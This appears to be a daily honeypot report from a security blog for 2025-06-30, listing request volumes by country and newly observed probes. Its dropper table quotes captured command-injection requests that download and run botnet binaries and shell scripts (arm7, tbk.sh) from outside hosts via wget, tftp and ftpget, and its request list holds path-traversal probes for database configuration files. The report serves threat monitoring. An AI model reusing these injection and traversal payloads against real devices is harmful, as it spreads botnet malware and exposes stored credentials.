Skip to main content
  1. Daily-Posts/

Report: 2025-06-30

·354 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-30
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 15 new requests that have never been observed before (these were added to the monitored request database.).

A total of 792 requests were recorded during the day, originating from 3 different countries, with a peak of 302 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRGermany
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.83GET /shell?rm arm7;wget http://141.98.11.83/m/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1
64.130.33.147POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F207.167.64.24%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%20207.167.64.24%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%20207.167.64.24%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20207.167.64.24%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1
108.165.153.7GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/185.117.0.90/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\x5C/185.117.0.90/arm4;chmod+777+arm4;./arm4+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
303GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1
1131\x00\x0E\x08pFX\xA0\xAE3\x1C\x1D\x00\x00\x00\x00\x00
1141\x00\x0E8pFX\xA0\xAE3\x1C\x1D\x00\x00\x00\x00\x00
1271GET /Ax9k HTTP/1.1
1281GET /BmId HTTP/1.1
1391\x00\x0E\x08r=\xD60\xE4\xDF\xE5\x06\x00\x00\x00\x00\x00
1401\x00\x0E8r=\xD60\xE4\xDF\xE5\x06\x00\x00\x00\x00\x00
1411\x00\x0E8\x1Cp\xFCF\xAC\x05\xACa\x00\x00\x00\x00\x00
1421\x01!\x01\x01\x01\x01\x01\x013\x00\x00\x00\x00\x00\x00\x00\x01\xEB\x03\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x11\x01\x01\x01\x01\x02\x01\x01\x04\x09node_data\x0C\x04
1431CONNECT 196.251.87.74:80 HTTP/1.0
1441\x04\x01\x00P\xC4\xFBWJ\x00
1611GET /EYnP HTTP/1.1
1621GET /9lkM HTTP/1.1
1731GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database HTTP/1.1
1741\x00\x0E\x08\x1Cp\xFCF\xAC\x05\xACa\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0302US
161RU
259GB
345NL
445BG
540DE
632SC
728FR
818LT
918IN
1013CH
1112JP
1212PL
1311CA
149CN
158IL
168TR
177NG
186HK
196AU
206AO
215BE
224SG
234UA
244GH
254VN
263BR
273ID
283KZ
292TW
302KR
312RO
322IE
332ZA
341IR
351AZ
361ES
371AR
381SE
391IT

Related

Report: 2025-06-29
·309 words
Repport Daily
Report: 2025-06-28
·339 words
Repport Daily
Report: 2025-06-27
·336 words
Repport Daily